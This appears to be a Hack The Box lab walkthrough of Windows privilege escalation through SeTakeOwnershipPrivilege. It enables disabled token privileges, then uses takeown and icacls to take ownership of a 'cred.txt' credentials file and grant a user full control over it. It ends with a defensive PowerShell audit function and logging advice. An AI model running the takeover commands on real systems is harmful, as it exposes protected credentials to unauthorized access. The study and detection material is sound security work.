## EnableAllTokenPrivs

GitHub page

Run the script to enable the privileges that are present but disabled in the current process token (SeTakeOwnershipPrivilege among them):

```powershell
.\EnableAllTokenPrivs.ps1
```

## Exploit

View the file's owner, attributes and last write time

```powershell
Get-ChildItem -Path 'C:\Department Shares\Private\IT\cred.txt' | Select Fullname,LastWriteTime,Attributes,@{Name="Owner";Expression={ (Get-Acl $_.FullName).Owner }}
cmd /c dir /q 'C:\Department Shares\Private\IT'
```

Take ownership

```powershell
takeown /f 'C:\Department Shares\Private\IT\cred.txt'
```

Grant ourselves full access to the file

```powershell
icacls 'C:\Department Shares\Private\IT\cred.txt' /grant htb-student:F
```
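The takeown/icacls sequence above leaves two traces on the file: a changed owner and a new explicit Full Control ACE for a non-admin account. As an added example that is not part of the original page or the EnableAllTokenPrivs project, the PowerShell function below audits a list of sensitive files for exactly that drift; `Test-FileOwnershipDrift`, the expected owner and the sample path are assumptions constructed for this demo.

```powershell
# Added example (not from the original page). Audits files for the changes a
# SeTakeOwnershipPrivilege abuse leaves behind: an unexpected owner and an
# explicit FullControl ACE for a principal outside the trusted set.
function Test-FileOwnershipDrift {
    param(
        [Parameter(Mandatory)][string[]]$Paths,
        # Assumption: sensitive share content is normally owned by Administrators.
        [string]$ExpectedOwner = 'BUILTIN\Administrators',
        [string[]]$TrustedPrincipals = @('BUILTIN\Administrators', 'NT AUTHORITY\SYSTEM')
    )
    $full = [System.Security.AccessControl.FileSystemRights]::FullControl
    foreach ($p in $Paths) {
        if (-not (Test-Path -LiteralPath $p)) { continue }
        $acl = Get-Acl -LiteralPath $p
        $findings = @()

        # Ownership drift: takeown rewrites the owner to the caller (or Administrators).
        if ($acl.Owner -ne $ExpectedOwner) {
            $findings += "owner is '$($acl.Owner)', expected '$ExpectedOwner'"
        }

        # ACL drift: icacls /grant <user>:F adds an explicit (non-inherited) Allow ACE.
        foreach ($ace in $acl.Access) {
            $id = $ace.IdentityReference.Value
            $hasFull = (($ace.FileSystemRights -band $full) -eq $full)
            if ($ace.AccessControlType -eq 'Allow' -and $hasFull -and
                ($TrustedPrincipals -notcontains $id)) {
                $kind = if ($ace.IsInherited) { 'inherited' } else { 'explicit' }
                $findings += "FullControl ($kind) granted to '$id'"
            }
        }

        [pscustomobject]@{
            Path          = $p
            Owner         = $acl.Owner
            LastWriteTime = (Get-Item -LiteralPath $p).LastWriteTime
            Findings      = $findings
        }
    }
}

# Constructed sample path for the demo; replace with the files you actually monitor.
Test-FileOwnershipDrift -Paths @('C:\Department Shares\Private\IT\cred.txt') |
    Where-Object { $_.Findings.Count -gt 0 } |
    Format-List
```

Note that a file-level scan only shows the end state; with "Audit Sensitive Privilege Use" and an object SACL enabled, the takeown step is also recorded in the Security log as a privileged-object operation and the icacls step as a permissions change on the object, which gives the timeline the ACL alone cannot.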